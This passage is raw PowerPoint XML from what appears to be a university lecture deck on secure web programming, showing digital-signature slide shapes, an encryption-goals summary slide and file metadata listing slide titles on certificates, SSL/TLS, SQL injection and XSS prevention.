              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Digital</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="TextBox 147"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604106" y="5910357"/>
            <a:ext cx="883325" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Digital</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>Signature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="5-Point Star 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6518110" y="3497044"/>
            <a:ext cx="497717" cy="416551"/>
          </a:xfrm>
          <a:prstGeom prst="star5">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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38AC0B3B-4E10-B64D-A6B1-9A74D3B91400}"/>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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="311319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Summary – encryption goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Public key algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Symmetric key algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hashing algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signature </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{643EF796-1208-3B44-A8BB-34B44B69F3F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7678616" y="295730"/>
            <a:ext cx="791308" cy="767687"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5FD889E0-CAB2-4699-909D-B9A88D47ACBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15002585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T202_Template" id="{39D82ABA-158B-CC4F-8341-CB4BE71E0933}" vid="{027ABE4F-AB90-0C43-8EA3-72B3581221FA}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.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KIT202_Template" id="{39D82ABA-158B-CC4F-8341-CB4BE71E0933}" vid="{9DE789D6-519B-4941-B89B-65665DE8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33437</TotalTime>
  <Words>2551</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>440</Paragraphs>
  <Slides>41</Slides>
  <Notes>40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맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Century Gothic</vt:lpstr>
      <vt:lpstr>Courier</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>Ion Boardroom</vt:lpstr>
      <vt:lpstr>Secure Web Programming</vt:lpstr>
      <vt:lpstr>Topics</vt:lpstr>
      <vt:lpstr>Goals</vt:lpstr>
      <vt:lpstr>Computer Security</vt:lpstr>
      <vt:lpstr>Preventing the network attacks(2) </vt:lpstr>
      <vt:lpstr>Digital Signature</vt:lpstr>
      <vt:lpstr>Digital Signature</vt:lpstr>
      <vt:lpstr>Digital Signature</vt:lpstr>
      <vt:lpstr> Summary – encryption goals</vt:lpstr>
      <vt:lpstr>How do I find out the public key?</vt:lpstr>
      <vt:lpstr>Certificates</vt:lpstr>
      <vt:lpstr>Certificate Content</vt:lpstr>
      <vt:lpstr>Traditional Authentication</vt:lpstr>
      <vt:lpstr>Certificate-based Authentication</vt:lpstr>
      <vt:lpstr>Certificates Example</vt:lpstr>
      <vt:lpstr>Preventing the network attacks(3) :HTTPS</vt:lpstr>
      <vt:lpstr>SSL (Secure Socket Layer)</vt:lpstr>
      <vt:lpstr>SSL Process</vt:lpstr>
      <vt:lpstr>Types of SSL Certificates</vt:lpstr>
      <vt:lpstr>Types of SSL Certificates</vt:lpstr>
      <vt:lpstr>TLS (Transport Layer Security)</vt:lpstr>
      <vt:lpstr>TLS (Transport Layer Security)</vt:lpstr>
      <vt:lpstr>Various types of attacks</vt:lpstr>
      <vt:lpstr>Code injection Attacks</vt:lpstr>
      <vt:lpstr>SQL Injection example</vt:lpstr>
      <vt:lpstr>SQL Injection example</vt:lpstr>
      <vt:lpstr>SQL Injection example</vt:lpstr>
      <vt:lpstr>SQL Injection Attacks example</vt:lpstr>
      <vt:lpstr>Prevent SQL injection attacks </vt:lpstr>
      <vt:lpstr>Prevent SQL injection attacks </vt:lpstr>
      <vt:lpstr>Prevent SQL injection attacks </vt:lpstr>
      <vt:lpstr>XSS (Cross-site scripting)</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>How to prevent the XSS attacks</vt:lpstr>
      <vt:lpstr>Various types of attacks</vt:lpstr>
      <vt:lpstr>Other Possible Attacks</vt:lpstr>
      <vt:lpstr>Concluding remarks </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Resources</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>University of Tasmania</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Web Programming</dc:title>
  <dc:creator>Soyeon HAN</dc:creator>
  <cp:lastModifiedBy>Soonja Yeom</cp:lastModifiedBy>
  <cp:revision>359</cp:revision>
  <cp:lastPrinted>2015-02-24T02:13:19Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-11-07T09:10:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-05-23T02:53:10Z</dcterms:modified>
</cp:coreProperties>
</file>